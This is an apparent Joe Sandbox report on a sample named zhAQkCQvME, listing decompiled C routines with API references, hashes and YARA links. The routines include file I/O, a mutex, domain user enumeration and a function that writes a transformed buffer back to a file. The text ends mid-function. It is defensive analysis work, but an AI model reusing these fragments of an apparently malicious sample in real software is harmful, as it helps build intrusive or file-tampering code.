0x0040ed24
0x0040ed89
0x00000000
0x0040ed89
0x0040ed26
0x0040ed2a
0x0040ed38
0x0040ed54
0x00000000
0x0040ed82
0x00000000
0x0040ed82
0x0040ed54
0x0040ecf0
0x0040ecf4
0x00000000

APIs

EqualSid.ADVAPI32(?,?), ref: 0040ECE6

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Equal
String ID:
API String ID: 4016716531-0
Opcode ID: 1e3467ff6e9864bf2a3c34904192835de73077657b31417c6f32c1063ab1bf8a
Instruction ID: d1dd7a5dd968d067fbd471543fc5ad84fc5c99fa3d3cf06ddc21349d18034fc0
Opcode Fuzzy Hash: 1e3467ff6e9864bf2a3c34904192835de73077657b31417c6f32c1063ab1bf8a
Instruction Fuzzy Hash: 18218875604109DBCB14CF96DD84AEBB3B5EF88304F108AAAEC09E7381E735DE519B94

Uniqueness

Uniqueness Score: 3.15%

Function 005C25B6, Relevance: 1.6, APIs: 1, Instructions: 67libraryCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 005C26B9

Memory Dump Source

Source File: 00000000.00000002.470846166.005C0000.00000040.00000001.sdmp, Offset: 005C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5c0000_zhAQkCQvME.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction ID: 07902b04cf3c849a6ab0b9b2b88945973d72e15cdc3ecce7a864a061cd88e983
Opcode Fuzzy Hash: dc0c4d43fe983135e74e490fe037b27f10ab28b4497bd724162dc62f42f2da68
Instruction Fuzzy Hash: 7A21AE75A093418FC768CF68D190B5EBBE1BFC8714F64492EF59A87750D771A880CB42

Uniqueness

Uniqueness Score: 0.02%

Function 004085E0, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004085E0(void* _a4, intOrPtr _a8, intOrPtr _a12) {
				struct _OVERLAPPED* _v8;
				struct _OVERLAPPED* _v12;
				long _v16;
				int _t21;

				_v12 = 0;
				_v8 = 0;
				if(_a12 != 0) {
					if(_a12 >= 0) {
						while(1) {
							_v16 = 0;
							_t21 = WriteFile(_a4, _a8 + _v12, _a12 - _v12,  &_v16, 0); // executed
							_v8 = _t21;
							if(_v8 == 0) {
								break;
							}
							_v12 = _v12 + _v16;
							if(_v12 < _a12) {
								continue;
							}
							return 1;
						}
						return 0;
					}
					return 0;
				}
				return 1;
			}

0x004085e6
0x004085ed
0x004085f8
0x00408605
0x0040860b
0x0040860b
0x0040862a
0x00408630
0x00408637
0x00000000
0x00000000
0x00408643
0x0040864c
0x00000000
0x00000000
0x00000000
0x0040864e
0x00000000
0x00408639
0x00000000
0x00408607
0x00000000

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74c3b2f11a1a7e72fe4b25b14c905eca0f799f36b1cb2798bbea0bb483d3ca7d
Instruction ID: 7667817b58f3b803be8f59bcb92a5ac90ec484aafa380457b2b071bb1ef8608e
Opcode Fuzzy Hash: 74c3b2f11a1a7e72fe4b25b14c905eca0f799f36b1cb2798bbea0bb483d3ca7d
Instruction Fuzzy Hash: 68010C7090420CEFDF00DF94CA44B9EB7B5AB44304F1089AAE815A7380C7B99695CF99

Uniqueness

Uniqueness Score: 0.00%

Function 00408660, Relevance: 1.5, APIs: 1, Instructions: 40
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00408660(void* _a4, intOrPtr _a8, intOrPtr _a12, struct _OVERLAPPED** _a16) {
				struct _OVERLAPPED* _v8;
				long _v12;
				int _t21;

				_v8 = 0;
				while(1 != 0) {
					_v12 = 0;
					_t21 = ReadFile(_a4, _a8 + _v8, _a12 - _v8,  &_v12, 0); // executed
					if(_t21 != 0) {
						if(_v12 != 0) {
							_v8 = _v8 + _v12;
							continue;
						}
						break;
					}
					return 0;
				}
				if(_a16 != 0) {
					 *_a16 = _v8;
				}
				return 1;
			}

0x00408666
0x0040866d
0x00408676
0x00408695
0x0040869d
0x004086a7
0x004086b1
0x00000000
0x004086b1
0x00000000
0x004086a9
0x00000000
0x0040869f
0x004086ba
0x004086c2
0x004086c2
0x00000000

APIs

ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 00408695

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 6ef23a7ba4abc0c3d73240054a51608974770c6b3b59acf9c6f378ae90628da5
Instruction ID: 405d3006788000f451839f1c17972e73f38cddd34bac522f7c5f74e1d461a6eb
Opcode Fuzzy Hash: 6ef23a7ba4abc0c3d73240054a51608974770c6b3b59acf9c6f378ae90628da5
Instruction Fuzzy Hash: DA012C70A00208EFDB14CF98CB44BAE7BB4AB54304F214569E845A7380DB7A9E54DB99

Uniqueness

Uniqueness Score: 0.02%

Function 00410B40, Relevance: 1.5, APIs: 1, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00410B40(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				char* _v12;
				int _t12;

				_v12 = 0;
				E00410BA0(0, _a4, _a8); // executed
				_t12 = NetGetDCName(0, 0,  &_v12); // executed
				_v8 = _t12;
				if(_v8 != 0) {
					while(0 != 0) {
					}
				} else {
					E00410BA0(_v12, _a4, _a8);
				}
				return 0;
			}

0x00410b46
0x00410b57
0x00410b67
0x00410b6c
0x00410b73
0x00410b8b
0x00410b8f
0x00410b75
0x00410b81
0x00410b86
0x00410b96

APIs

Part of subcall function 00410BA0: NetUserEnum.NETAPI32(?,00000000,00000002,?,000000FF,?,?,?), ref: 00410BDE

NetGetDCName.NETAPI32(00000000,00000000,?), ref: 00410B67

Part of subcall function 00410BA0: LookupAccountNameW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,?,?), ref: 00410C51
Part of subcall function 00410BA0: LookupAccountNameW.ADVAPI32(00000000,?,?,00000000,?,?,?), ref: 00410CB6
Part of subcall function 00410BA0: Sleep.KERNELBASE(0000000A), ref: 00410CE8
Part of subcall function 00410BA0: NetApiBufferFree.NETAPI32(?,?,00000000,00000002,?,000000FF,?,?,?), ref: 00410CF7

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Name$AccountLookup$BufferEnumFreeSleepUser
String ID:
API String ID: 1425401153-0
Opcode ID: ce0bed20507ecd3137de69c433f12cce0d39b26dd278a63af5f0cbe9dcaf9c93
Instruction ID: 2ee2fc1d28c9c7267cc80164ad064fd59712f73901573b666b20ff48ed1e215c
Opcode Fuzzy Hash: ce0bed20507ecd3137de69c433f12cce0d39b26dd278a63af5f0cbe9dcaf9c93
Instruction Fuzzy Hash: 5EF0BBB5918108BBDB40DEE4DC42FDE37B49744319F10815AF90C87281D5F4AAC09795

Uniqueness

Uniqueness Score: 3.53%

Function 004085A0, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004085A0(void* __ecx, WCHAR* _a4) {
				struct _SECURITY_ATTRIBUTES* _v8;
				void* _t7;

				_v8 = 0;
				_t7 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				_v8 = _t7;
				if(_v8 != 0xffffffff) {
					return _v8;
				}
				return 0;
			}

0x004085a4
0x004085be
0x004085c4
0x004085cb
0x00000000
0x004085d1
0x00000000

APIs

CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 004085BE

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 1bbcf52f892634e498fbc0ed0c011204fa3f8d935c9dd6bddae7431aeb66c95b
Instruction ID: 33131ef57db96e1748f5206403396a41968b64a9397f081e274c8a1fc9b31223
Opcode Fuzzy Hash: 1bbcf52f892634e498fbc0ed0c011204fa3f8d935c9dd6bddae7431aeb66c95b
Instruction Fuzzy Hash: 02E0E674A4530CFBDB30CBA4DD05F9AB7A89704711F304659BE15BB2C0D6B56B409B58

Uniqueness

Uniqueness Score: 0.01%

Function 00408C90, Relevance: 1.5, APIs: 1, Instructions: 21
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00408C90() {
				void* _t1;

				if( *0x421704 == 0) {
					_t1 = CreateMutexA(0, 0, 0); // executed
					 *0x421704 = _t1;
					if( *0x421704 != 0) {
						return 0;
					}
					while(0 != 0) {
					}
					return 0xffffffff;
				}
				return 0;
			}

0x00408c9a
0x00408ca6
0x00408cac
0x00408cb8
0x00000000
0x00408cc5
0x00408cba
0x00408cbe
0x00000000
0x00408cc0
0x00000000

APIs

CreateMutexA.KERNELBASE(00000000,00000000,00000000,?,00409299,?,0040926C), ref: 00408CA6

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CreateMutex
String ID:
API String ID: 1964310414-0
Opcode ID: be9363668a59d1d065b0c9bea61f184afbd78ee2641f20e4f7368b0df4683379
Instruction ID: 8cdca8039aba617011aca1b6f54a7b36f50367a842d1abd972854c9fa9e16dff
Opcode Fuzzy Hash: be9363668a59d1d065b0c9bea61f184afbd78ee2641f20e4f7368b0df4683379
Instruction Fuzzy Hash: D9E0EC3066FB04D9F36057B49F0576231A4A3A0716F90453BD296A62E0DAB85441893E

Uniqueness

Uniqueness Score: 0.03%

Function 0040E040, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetFileAttributesA.KERNELBASE(00000000), ref: 0040E051

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: c6e08765be42376bad72b965cf4e9b43c4af554d7fbed2cc7116ffbde142b121
Instruction ID: ac6066153a57d135269558427229096415d81d07cef92149f26d27b674a7da94
Opcode Fuzzy Hash: c6e08765be42376bad72b965cf4e9b43c4af554d7fbed2cc7116ffbde142b121
Instruction Fuzzy Hash: 49E08C75D00208EBCB14CFB8D8842DDBB74AB00310F20C2AAD81073380E6314A518B85

Uniqueness

Uniqueness Score: 0.01%

Function 00403EE0, Relevance: 1.5, APIs: 1, Instructions: 14
memoryCOMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E00403EE0(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;
				void* _t8;

				_t8 =  *0x41f6e0; // 0x15d0000
				_t5 = RtlAllocateHeap(_t8, 8, _a4); // executed
				_v8 = _t5;
				return _v8;
			}

0x00403eea
0x00403ef1
0x00403ef7
0x00403f00

APIs

RtlAllocateHeap.NTDLL(015D0000,00000008,00415340,?,?,00403F90,00407DD5,?,?,00407DD6,00415340,00000839), ref: 00403EF1

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 35bc02f4ffb87093f2814c95544ea4251af5ae266243123b88d24d92941962a9
Instruction ID: 0ceca045e162cb1febe9b3c12ebb3c4045f40851b03943953fa4d15afe6cbf27
Opcode Fuzzy Hash: 35bc02f4ffb87093f2814c95544ea4251af5ae266243123b88d24d92941962a9
Instruction Fuzzy Hash: 91D0C975614208FBC704DF98EC41DAD7BACEB49350F1081A8FD0C97350DA32AE048B94

Uniqueness

Uniqueness Score: 0.00%

Function 0040E080, Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E080(void* __ecx, WCHAR* _a4) {
				long _v8;
				long _t7;

				_t7 = GetFileAttributesW(_a4); // executed
				_v8 = _t7;
				return 0 | _v8 != 0xffffffff;
			}

0x0040e088
0x0040e08e
0x0040e09d

APIs

GetFileAttributesW.KERNELBASE(?,?,?,0040FC12,?), ref: 0040E088

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: a4222c56ae4e70f76523ef7e8d34b028c892742be9020a09ecf16e480a52ebc8
Instruction ID: 033e08d5e30316c9c3bb1547d2e8cb8d78e312b27d5c587cb6fcc2c873bc2f5a
Opcode Fuzzy Hash: a4222c56ae4e70f76523ef7e8d34b028c892742be9020a09ecf16e480a52ebc8
Instruction Fuzzy Hash: E3D0127691530CFF8B10DFB4DC094CD77ACE705231B1087A4F818D3280E6319B509694

Uniqueness

Uniqueness Score: 0.01%

Function 00403EC0, Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403EC0() {
				void* _t1;

				_t1 = HeapCreate(0, 0x80000, 0); // executed
				 *0x41f6e0 = _t1;
				return _t1;
			}

0x00403ecc
0x00403ed2
0x00403ed8

APIs

HeapCreate.KERNELBASE(00000000,00080000,00000000,?,00403298), ref: 00403ECC

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 81d0d70f1b580f08ee667aa644c4110665c213463422074f4c18005b88026947
Instruction ID: 933acd87c34a425717aa9442d3c443e0c12362e22235e85fcbc93b20a71d9819
Opcode Fuzzy Hash: 81d0d70f1b580f08ee667aa644c4110665c213463422074f4c18005b88026947
Instruction Fuzzy Hash: 82B09231288708BBE250ABD1AC06B843A98A344B51F204031F70C592E1D6E120054B9D

Uniqueness

Uniqueness Score: 0.02%

Function 00405DF0, Relevance: 1.5, APIs: 1, Instructions: 208
COMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405DF0(intOrPtr _a4) {
				signed int _v8;
				char _v276;
				int _v280;
				signed int _v284;
				void* _v288;
				char _v308;
				signed int _t74;
				void* _t91;
				signed int _t93;
				signed short _t100;
				signed int _t141;
				void* _t168;
				void* _t169;
				void* _t170;
				void* _t172;
				void* _t174;
				void* _t175;
				void* _t177;
				void* _t180;

				_v288 = 0xffffffff;
				_v284 = 0;
				_v280 = 0;
				_v8 = 0;
				_t6 = _a4 + 0x420; // 0xc738ec83
				_t118 =  *_t6 & 0x0000ffff;
				if(( *_t6 & 0x0000ffff) != 0) {
					_t11 = _a4 + 0x428; // 0x45c70000
					_t141 =  *_t11 + 0x14;
					__eflags = _t141;
					_v8 = _t141;
				} else {
					_t8 = _a4 + 0x428; // 0x45c70000
					_v8 =  *_t8 + 0x28;
				}
				_t74 = E00403EE0(_t118, _v8);
				_t169 = _t168 + 4;
				_v284 = _t74;
				if(_v284 != 0) {
					_t18 = _a4 + 0x428; // 0x45c70000
					_t20 = _a4 + 0x424; // 0xe845
					E0040D590( *_t20,  *_t18,  &_v308);
					_t170 = _t169 + 0xc;
					_t22 = _a4 + 0x420; // 0xc738ec83
					__eflags =  *_t22 & 0x0000ffff;
					if(( *_t22 & 0x0000ffff) != 0) {
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L20;
							}
						}
						while(1) {
							L20:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						E00404040(_v284, _v284,  &_v308, 0x14);
						_t46 = _a4 + 0x428; // 0x45c70000
						_t48 = _a4 + 0x424; // 0xe845
						__eflags = _v284 + 0x14;
						E00404040(_a4, _v284 + 0x14,  *_t48,  *_t46);
						_t172 = _t170 + 0x18;
						while(1) {
							__eflags = 0;
							if(0 == 0) {
								goto L25;
							}
						}
						while(1) {
							L25:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_t52 = _a4 + 0x420; // 0xc738ec83
						__eflags = _a4 + 0x400;
						E0040D940(_a4 + 0x400,  *_t52 & 0x0000ffff,  &_v276);
						E0040DA30(_v284, _v8,  &_v276);
						_t174 = _t172 + 0x18;
						L28:
						_t58 = _a4 + 0x438; // 0xdc45c7
						asm("sbb edx, edx");
						_t91 = E00408540(_a4, _a4,  ~( ~( *_t58 & 0x00000002)) + 1); // executed
						_t175 = _t174 + 8;
						_v288 = _t91;
						__eflags = _v288 - 0xffffffff;
						if(_v288 != 0xffffffff) {
							_t93 = E004085E0(_v288, _v284, _v8); // executed
							_t175 = _t175 + 0xc;
							__eflags = _t93;
							if(_t93 == 0) {
								_v280 = 0xfffffffd;
							}
							L34:
							__eflags = _v288 - 0xffffffff;
							if(_v288 != 0xffffffff) {
								CloseHandle(_v288); // executed
							}
							__eflags = _v284;
							if(_v284 != 0) {
								E00403F10( &_v284, 0);
							}
							return _v280;
						} else {
							goto L29;
						}
						while(1) {
							L29:
							__eflags = 0;
							if(0 == 0) {
								break;
							}
						}
						_v280 = 0xfffffffe;
						goto L34;
					} else {
						goto L6;
					}
					while(1) {
						L6:
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					__eflags = _a4 + 0x400;
					_t100 = E004052F0(_a4 + 0x400, _a4 + 0x400, 0x14, 0x14);
					_t177 = _t170 + 0xc;
					 *(_a4 + 0x420) = _t100;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					E00404040(_v284, _v284, _a4 + 0x400, 0x14);
					E00404040(_v284, _v284 + 0x14,  &_v308, 0x14);
					_t31 = _a4 + 0x428; // 0x45c70000
					_t33 = _a4 + 0x424; // 0xe845
					__eflags = _v284 + 0x28;
					E00404040( *_t33, _v284 + 0x28,  *_t33,  *_t31);
					_t180 = _t177 + 0x24;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					_t37 = _a4 + 0x420; // 0xc738ec83
					E0040D940(_a4 + 0x400,  *_t37 & 0x0000ffff,  &_v276);
					_t41 = _a4 + 0x428; // 0x45c70000
					__eflags = _v284 + 0x14;
					E0040DA30(_v284 + 0x14,  *_t41 + 0x14,  &_v276);
					_t174 = _t180 + 0x18;
					while(1) {
						__eflags = 0;
						if(0 == 0) {
							break;
						}
					}
					goto L28;
				} else {
					return _t74 | 0xffffffff;
				}
			}

0x00405df9
0x00405e03
0x00405e0d
0x00405e17
0x00405e21
0x00405e21
0x00405e2a
0x00405e40
0x00405e46
0x00405e46
0x00405e49
0x00405e2c
0x00405e2f
0x00405e38
0x00405e38
0x00405e50
0x00405e55
0x00405e58
0x00405e65
0x00405e79
0x00405e83
0x00405e8a
0x00405e8f
0x00405e95
0x00405e9c
0x00405e9e
0x00405f85
0x00405f85
0x00405f87
0x00000000
0x00000000
0x00405f89
0x00405f8b
0x00405f8b
0x00405f8b
0x00405f8d
0x00000000
0x00000000
0x00405f8f
0x00405fa1
0x00405fac
0x00405fb6
0x00405fc3
0x00405fc7
0x00405fcc
0x00405fcf
0x00405fcf
0x00405fd1
0x00000000
0x00000000
0x00405fd3
0x00405fd5
0x00405fd5
0x00405fd5
0x00405fd7
0x00000000
0x00000000
0x00405fd9
0x00405fe5
0x00405ff0
0x00405ff6
0x00406010
0x00406015
0x00406018
0x0040601b
0x00406026
0x00406032
0x00406037
0x0040603a
0x00406040
0x00406047
0x0040606d
0x00406072
0x00406075
0x00406077
0x00406079
0x00406079
0x00406083
0x00406083
0x0040608a
0x00406093
0x00406093
0x00406099
0x004060a0
0x004060ab
0x004060b0
0x00000000
0x00000000
0x00000000
0x00000000
0x00406049
0x00406049
0x00406049
0x0040604b
0x00000000
0x00000000
0x0040604d
0x0040604f
0x00000000
0x00000000
0x00000000
0x00000000
0x00405ea4
0x00405ea4
0x00405ea4
0x00405ea6
0x00000000
0x00000000
0x00405ea8
0x00405eb1
0x00405eb7
0x00405ebc
0x00405ec2
0x00405ec9
0x00405ec9
0x00405ecb
0x00000000
0x00000000
0x00405ecd
0x00405ee1
0x00405efc
0x00405f07
0x00405f11
0x00405f1e
0x00405f22
0x00405f27
0x00405f2a
0x00405f2a
0x00405f2c
0x00000000
0x00000000
0x00405f2e
0x00405f3a
0x00405f4c
0x00405f5e
0x00405f6e
0x00405f72
0x00405f77
0x00405f7a
0x00405f7a
0x00405f7c
0x00000000
0x00000000
0x00405f7e
0x00000000
0x00405e67
0x00000000
0x00405e67

APIs

CloseHandle.KERNELBASE(000000FF), ref: 00406093

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: dd70d89f8dbe563468fd7b6e1336b767168b6ad53636f0b4a063005a1799281d
Instruction ID: 394509b34c222a43e97a32e18326a21232eacbf785f67fe5eb5a0578b8d6d8b3
Opcode Fuzzy Hash: dd70d89f8dbe563468fd7b6e1336b767168b6ad53636f0b4a063005a1799281d
Instruction Fuzzy Hash: CB8164B1A001089BCB58DB54DC41BEA7375AF88318F1481B9F709A72C2D6399B81CFD9

Uniqueness

Uniqueness Score: 0.03%

Function 0040FFD0, Relevance: 1.3, APIs: 1, Instructions: 79
sleepCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E0040FFD0(intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				int _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _t38;
				char _t42;
				void* _t53;
				void* _t54;

				_v8 = 0xffffffff;
				_v12 = 0;
				_v28 = 0;
				_v28 = E0040C020();
				if(_v28 != 2) {
					_v24 = E0040FF20;
					_v20 = E0040FF80;
				} else {
					_v24 = E0040FF80;
					_v20 = E0040FF20;
				}
				_v12 = 0;
				while(_v12 < 3) {
					_t38 =  *((intOrPtr*)( *((intOrPtr*)(_t53 + _v12 * 4 - 0x14))))(_a4, _a8,  &_v32); // executed
					_t54 = _t54 + 0xc;
					if(_t38 != 0) {
						_v8 = 0xffffffff;
						goto L21;
					} else {
						_v40 = 0;
						Sleep(0x1388); // executed
						_t42 = E004086D0(_a8, _a8,  &_v40); // executed
						_t54 = _t54 + 8;
						_v36 = _t42;
						if(_v36 == 0) {
							while(0 != 0) {
							}
							_v8 = 0xfffffffd;
							goto L19;
						} else {
							E00403F10( &_v36, 0); // executed
							_t54 = _t54 + 8;
							if(_v40 <= 0) {
								_v8 = 0xfffffffe;
								while(0 != 0) {
								}
								L19:
								L21:
								_v12 = _v12 + 1;
								continue;
							} else {
								while(0 != 0) {
								}
								_v8 = 0;
							}
						}
					}
					break;
				}
				if(_v8 < 0) {
					while(0 != 0) {
					}
				}
				return _v8;
			}

0x0040ffd6
0x0040ffdd
0x0040ffe4
0x0040fff0
0x0040fff7
0x00410009
0x00410010
0x0040fff9
0x0040fff9
0x00410000
0x00410000
0x00410017
0x00410029
0x00410046
0x00410048
0x0041004d
0x004100bd
0x00000000
0x0041004f
0x0041004f
0x0041005b
0x00410069
0x0041006e
0x00410071
0x00410078
0x004100ae
0x004100b2
0x004100b4
0x00000000
0x0041007a
0x00410080
0x00410085
0x0041008c
0x0041009f
0x004100a6
0x004100aa
0x004100bb
0x004100c4
0x00410026
0x00000000
0x0041008e
0x0041008e
0x00410092
0x00410094
0x00410094
0x0041008c
0x00410078
0x00000000
0x0041004d
0x004100cd
0x004100cf
0x004100d3
0x004100cf
0x004100db

APIs

Sleep.KERNELBASE(00001388), ref: 0041005B

Memory Dump Source

Source File: 00000000.00000002.470640963.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.470633953.00400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470675585.00415000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.470699643.0041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.470722428.00422000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_zhAQkCQvME.jbxd

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 23d0245e3c33e24e87f82c3aab0170a779a759f963e9ade8e1fe37202b5f6cda
Instruction ID: be19f29430a7ec38c664c6fcd3407857e98ac620d32806045ff96b6a9b09cf9d
Opcode Fuzzy Hash: 23d0245e3c33e24e87f82c3aab0170a779a759f963e9ade8e1fe37202b5f6cda
Instruction Fuzzy Hash: 30314F70901209DBCF10DFA4E9457EEBFB0AB48318F20826BD515672C4D7B94BC5DB9A

Uniqueness

Uniqueness Score: 0.00%

Function 0040EB00, Relevance: 1.3, APIs: 1, Instructions: 59
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E0040EB00(intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				void* _t21;
				intOrPtr _t24;
				intOrPtr _t25;
				void* _t30;

				_v8 = 0;
				_v12 = 0xffffffff;
				_v20 = 1;
				_v16 = E0040C070();
				while(0 != 0) {
				}
				if(_v16 != 2) {
					if(_v16 == 1) {
						while(0 != 0) {
						}
						_t26 = _a4;
						_t24 = E00410920(_a4);
						_t30 = _t30 + 4;
						_v8 = _t24;
					}
				} else {
					while(1) {
